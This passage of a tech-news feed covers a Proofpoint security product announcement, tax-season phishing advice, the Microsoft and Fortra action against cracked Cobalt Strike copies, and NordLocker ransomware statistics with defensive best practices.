According to the company, the new innovations further enhance its threat and information protection platforms, in addition to its newly formed Identity Threat Defense business (formerly known as Illusive), to help organizations augment and safeguard their productivity investments, such as Microsoft 365, with maximum deployment flexibility.

“Proofpoint continues to deliver on innovations that empower organizations to break the attack chain,” said Ryan Kalember, executive vice president of cybersecurity strategy at Proofpoint, in a statement. “By providing our customers a unified path to solve for risk across email, cloud, identity and data, CISOs gain unparalleled visibility into and protection against the tactics that attackers rely on most.”

Proofpoint’s Aegis Threat Protection Platform

Proofpoint Aegis Threat Protection Platform is an AI/ML-powered threat protection platform that disarms attacks such as business email compromise (BEC), phishing, ransomware and supply chain threats. With flexible deployment options using both APIs and inline architecture, Aegis delivers AI-powered, cloud-based protection that complements native Microsoft 365 defenses, says Proofpoint.

By combining the company’s proprietary behavioral analytics and threat intelligence, Proofpoint is delivering new capabilities that provide visibility into account takeover-based attacks from both within an organization’s environment and outside suppliers.

Supplier Threat Protection

Supplier relationships are a growing attack vector: 69% of organizations experienced a supply chain attack within the past year, and CISOs rate it as one of their top concerns, according to Proofpoint research. With Proofpoint’s Supplier Threat Protection, organizations can detect compromised supplier accounts so that security teams can swiftly investigate and remediate.

This new product proactively monitors for and prioritizes known compromised third-party accounts, and it simplifies investigation with details on why the account is suspected to be compromised and which employees recently communicated with the account in question, enabling security teams to seamlessly defend against prevalent third-party attacks such as BEC and phishing.

Targeted Attack Prevention Account Takeover (TAP ATO)

Threat actors successfully override MFA in 30% of all targeted cloud and email account takeover attacks, according to Proofpoint threat research. Once inside, malicious actors can hide undetected in an organization’s environment, waging sophisticated attacks at will.

Proofpoint TAP ATO, available at the end of Q2 2023, provides visibility across the entire email account takeover attack chain. It accelerates response investigation and remediates accounts, malicious mailbox rule changes, manipulation of third-party apps and data exfiltration across email and cloud environments.

Identity Threat Defense (formerly known as Illusive)

From ransomware to APTs, 90% of attacks rely on compromised identities, says Proofpoint. The complexity of managing Active Directory (AD) has resulted in the presence of exploitable privileged identity risks in all organizations at a rate of one in six endpoints.

These identity risks include unmanaged local admins with stale passwords, misconfigured users with unnecessary privileges, cached credentials left exposed on endpoints and much more. When an attacker compromises an endpoint with these privileged identity risks, deploying malicious software and stealing data is easy. Privileged identities represent the keys to the kingdom, which attackers exploit to steal the crown jewels. Unfortunately, most organizations are unaware of this risk – until they are attacked.

Leveraging new advanced identity risk analytics and automated detection, Proofpoint has further bolstered its Identity Threat Defense platform – undefeated in more than 150 red team exercises – to provide organizations with comprehensive identity risk protection and remediation:

Spotlight Risk Analytics

The new advanced risk analytics in the Spotlight dashboard allows users to gain an executive view of an organization’s risk trends as well as exposure across various risk categories and risk exposure levels. It also provides recommendations for possible user admin action.

Spotlight Risk Analytics simplifies decision makers’ workload while ensuring organizational leaders can make informed decisions to remediate modern and sophisticated identity risks. With availability expected late Q2 2023, decision makers will also be able to follow risk trends to track their organization’s risk posture improvements over time.

Proofpoint Spotlight Cross Domain & Trust Visibility

For organizations with complex infrastructure, including multinational, multi-business and merging organizations, identity infrastructure is often stitched together without broader visibility.

Spotlight Cross Domain & Trust Visibility provides insight to understand where AD domains across companies have too much bi-directional trust, which can result in identity risk and lateral movement by attackers. Business leaders can gain a centralized view into the broadest organizational structure’s domains and trusts to better prevent identity risk exposure in a holistic fashion.

Sigma Information Protection Platform

Since its introduction in early 2020, Proofpoint’s information protection business has grown a remarkable 107%, making the company the second largest data loss prevention (DLP) vendor globally and by revenue according to Gartner. Driven by the accelerated adoption of work-from-anywhere practices, the Proofpoint Sigma Information Protection platform is now deployed to over 5,000 customers and 46 million users worldwide, analyzing 45 billion events each month, and trusted by nearly half of the Fortune 100.

Proofpoint’s Information Protection platform merges content inspection, threat telemetry and user behavior across channels in a unified, cloud-native interface.

Privacy by Design Data Loss Prevention

As international organizations work to meet new and changing local privacy and data sovereignty requirements, Proofpoint now hosts its Sigma Information Protection platform in regions such as the European Union, Japan, and Australia in addition to the U.S.

Proofpoint is also further investing in privacy-related capabilities so that organizations can mask sensitive data in the console to limit its exposure and create custom data access policies to address privacy and compliance needs.

Additional features are available in beta, with general availability expected in Q3 2023, enabling organizations to anonymize identifying user information so analysts can investigate without bias and with better privacy for the user.

Administrators will also be able to set up metadata for anonymization and approval workflows for de-anonymizing the metadata during investigation.

Best Practices on How to Avoid Phishing Scams Ahead of Tax Day
https://mytechdecisions.com/network-security/best-practices-on-how-to-avoid-phishing-scams-ahead-of-tax-day/
Mon, 10 Apr 2023 17:29:01 +0000
With April’s U.S. tax deadline, cybercriminals have sprung into action. For one, a devious Emotet malware phishing campaign has been launched, masquerading as official W-9 tax form emails sent from the Internal Revenue Service (IRS). A malicious group known as Tactical#Octopus is also on the prowl and looking to spread malware through fake file downloads claiming to be related to taxes.

Steven Spadaccini, VP of Threat Intelligence at SafeGuard Cyber, offers the following best practices for individuals and organizations to protect themselves from tax scams ahead of the U.S. tax deadline.

  1. Be vigilant when receiving unsolicited emails or attachments and verify the sender’s identity before opening or downloading any files. Don’t click on links or open attachments in emails from unknown sources, and always double-check the sender’s email address and content for any signs of phishing attempts.
  2. Enable macro-blocking in Microsoft Office to prevent macro-based attacks and keep software up to date to prevent exploits from taking advantage of known vulnerabilities. Many campaigns use malicious macros to deliver malware, so it’s crucial to block macros by default and only allow them in trusted documents.
  3. Use reputable cybersecurity solutions that can detect and block Emotet, and regularly back up important data to prevent data loss from ransomware attacks. Cybersecurity platforms like SafeGuard Cyber can detect and remove malware and other malicious software. Backing up your data ensures that you don’t lose important files in case of a ransomware attack.
  4. Educate your employees on how to identify and report phishing attempts and other suspicious activity to your IT department or local authorities to help prevent future attacks. Regular security awareness training can go a long way in helping employees identify and avoid phishing attacks, suspicious emails and social engineering tactics.

As the tax season looms and security threats like Emotet malware and Tactical#Octopus are active, enterprises must be mindful of potential cybersecurity threats that can arise from workplaces with cloud-based communication tools like Telegram, Line or WhatsApp. SMS is particularly vulnerable to phishing scams for illicit monetary gain—making it only a matter of time before the next big breach becomes reality.

By adopting these best practices, individuals and organizations can stay protected from these tax scams. Remember that prevention is always better than cure, and investing in cybersecurity measures and training can go a long way in mitigating the risks associated with these threats.

Steven Spadaccini is a seasoned senior cyber executive with more than 20 years of experience working for some of the highest-profile cybersecurity and technology companies in the world. Prior to joining SafeGuard Cyber, Steven held senior VP leadership positions at Absolute, Trend Micro, Imperva, FireEye (Trellix), and DTEX Systems as well as several other cyber security startups.

Microsoft, Fortra Take Action to Disrupt Ransomware Groups Targeting Healthcare
https://mytechdecisions.com/network-security/microsoft-fortra-take-action-to-disrupt-ransomware-groups-targeting-healthcare/
Fri, 07 Apr 2023 18:12:11 +0000
In a move that represents a growing offensive against cybercriminals, Microsoft, cybersecurity firm Fortra and Health Information Sharing and Analysis Center have taken action to disrupt ransomware groups that have been observed attacking healthcare organizations in more than 19 countries.

According to Microsoft, the company’s Digital Crimes Unit (DCU), Fortra and Health Information Sharing and Analysis Center (Health-ISAC) are taking both legal and technical action to disrupt the use of abused copies of Cobalt Strike and Microsoft software, which are favorite tools of ransomware groups.

This represents a new way of disrupting cybercrime, with a greater scope and more complex operation that doesn’t just disrupt the command and control infrastructure of malicious actors. Instead, Microsoft and Fortra are working to remove illegal, legacy copies of Cobalt Strike so they can no longer be used for malicious purposes.

Cobalt Strike, a brand owned by Fortra, is a legitimate and popular post-exploitation tool used for simulated attacks. However, older versions of the software have been abused and altered by hacking groups to launch attacks, including ransomware campaigns against the Government of Costa Rica and the Irish Health Service Executive.

Microsoft says the company’s software development kits and APIs are also abused as part of the coding of the malware as well as the criminal malware distribution infrastructure used to target and mislead the victims.

Amy Hogan-Burney, general manager of Microsoft’s DCU, writes in a blog that cracked copies of Cobalt Strike have been linked to more than 68 ransomware families impacting healthcare organizations.

The activity comes after Microsoft, Fortra and Health-ISAC obtained a court order from the U.S. District Court for the Eastern District of New York to disrupt the infrastructure, which includes notifying relevant internet service providers and computer emergency readiness teams to help sever the connection between operators and infected victim computers.

Investigation efforts between the companies included detection, analysis, telemetry and reverse engineering, with additional data and insights from partners to help strengthen the legal case. The actions focused only on disrupting cracked, legacy copies of Cobalt Strike and compromised Microsoft software, Hogan-Burney writes.

The company is also expanding a legal method used to disrupt malware and nation state operations to target the abuse of security tools used by a broad spectrum of hacking groups, which is hoped to significantly hinder the monetization of those tools and slow their use in attacks. This action is designed to force cybercriminals to change their tactics.

To that end, the action also included copyright claims against the malicious use of Microsoft’s and Fortra’s software code, which is altered for use by malicious actors.

Fortra is also taking steps to prevent the misuse of its software, including more stringent customer vetting, but criminals have historically stolen older versions of security software to create cracked copies to gain backdoor access into victim devices. Some infamous ransomware groups have been observed doing so, including Conti, LockBit and other groups involved in the ransomware-as-a-service model, according to Hogan-Burney.

However, ransomware groups and cybercriminals are notorious for regrouping and adopting new tactics, and they will likely do so again in this case.

“While this action will impact the criminals’ immediate operations, we fully anticipate they will attempt to revive their efforts,” Hogan-Burney writes. “Our action is therefore not one and done. Through ongoing legal and technical action, Microsoft, Fortra and Health-ISAC, along with our partners, will continue to monitor and take action to disrupt further criminal operations, including the use of cracked copies of Cobalt Strike.”

Businesses Beware: April is the Most Dangerous Month for Ransomware Attacks
https://mytechdecisions.com/network-security/businesses-beware-april-is-the-most-dangerous-month-for-ransomware-attacks/
Thu, 06 Apr 2023 13:56:21 +0000
The month of April has been identified as the most dangerous period in terms of ransomware attacks, according to research by end-to-end file encryption provider NordLocker. Last year, the month of April saw 294 ransomware incidents, the most attacks per month in all of 2022. Most of these attacks were carried out against U.S. and German companies, mainly targeting the manufacturing and finance industries, according to NordLocker research.

As a whole, 2022 was a turbulent year for cybersecurity, with ransomware attacks at the forefront. Cybercriminals conducted a number of large-scale attacks that caused major financial losses. According to NordLocker research, 2,263 ransomware attacks were carried out in 2022, 896 in the U.S. alone; 128 attacks targeted businesses in the U.K., 96 in Germany, 90 in Canada, and 74 in Italy. Nearly 2,000 companies were affected worldwide.

April 2022 Record-Breaking Ransomware Incidents

Despite the ups and downs of cyber threats over the year, one month was especially harmful — 20 ransomware groups vigorously attacked 192 companies worldwide. Compared to the annual average (188 attacks per month), April was record-breaking with 294 ransomware incidents, says NordLocker. Through April of 2022, companies with 11-50 employees were the most affected by cybersecurity breaches, with 80% of cases coming from the private sector, according to NordLocker.

The manufacturing industry was hit the hardest with 26 cyberattacks in April alone. The finance and tech sectors were also heavily targeted, with 19 and 18 breaches respectively. Additionally, the construction, retail, education and energy sectors were affected by ransomware numerous times during the month.

Twenty ransomware groups were responsible for these attacks, and LockBit and Conti were the most active, responsible for 33.21% and 23.72% of attacks respectively. In fact, these two Russian-linked gangs are specifically responsible for this peak: April was the month in which Conti and LockBit carried out more attacks than in any other month of 2022.

Businesses can safeguard themselves

Companies that were slow to update their security measures suffered the most damage. At the same time, those who kept up with new developments in the industry were often able to avoid such attacks altogether. Cybersecurity experts predicted a further rise in ransomware in the coming years, though many businesses remain unprepared to face such threats.

With April being such a precarious month for ransomware attacks, it’s more important than ever for businesses to take steps to protect themselves from this growing threat.

“We are continuously encouraging companies to take actions and reduce their chances of becoming victims of cybercrime. In a ransomware attack, companies can find themselves in a challenging situation when faced with a ransomware demand — often having no choice but to pay up or lose access to their data forever,” says Darius Borisas, head of business development for NordLocker.

Taking into account that in February one of the most notorious ransomware groups set an all-time record for its attacks, April is expected to be a high-risk month.

Best Practices to Protect Businesses from Ransomware Attacks

Borisas explains that ransomware continues to be one of the biggest threats facing businesses today. Organizations must stay ahead of attackers by implementing effective security measures throughout the year — not just in April.

Borisas outlines four foundational cybersecurity best practices for businesses to employ:

  • Back up and encrypt your files. File backup is a fundamental cybersecurity practice and worth the additional investment because, in the unfortunate case of an attack, you will always have a copy of your files, and the sudden loss won’t interfere with your business operations. However, the most important and confidential files should be encrypted so that no one can access them. Use an encrypted cloud for confidential data storage to avoid accidents and protect your files from prying eyes.
  • Adopt zero-trust network access. Every access request to digital resources by a staff member should be granted only after their identity has been appropriately verified.
  • Train your employees. Proper knowledge about the most common types of threats is one of the main cornerstones of organizational cybersecurity. Training your employees on how to identify and deal with threats can have a profound impact on your company’s cybersecurity.
  • Keep your software up to date. Software updates make the experience better, safer and more efficient, and they fix security loopholes, protecting your data before hackers learn how to exploit those vulnerabilities.
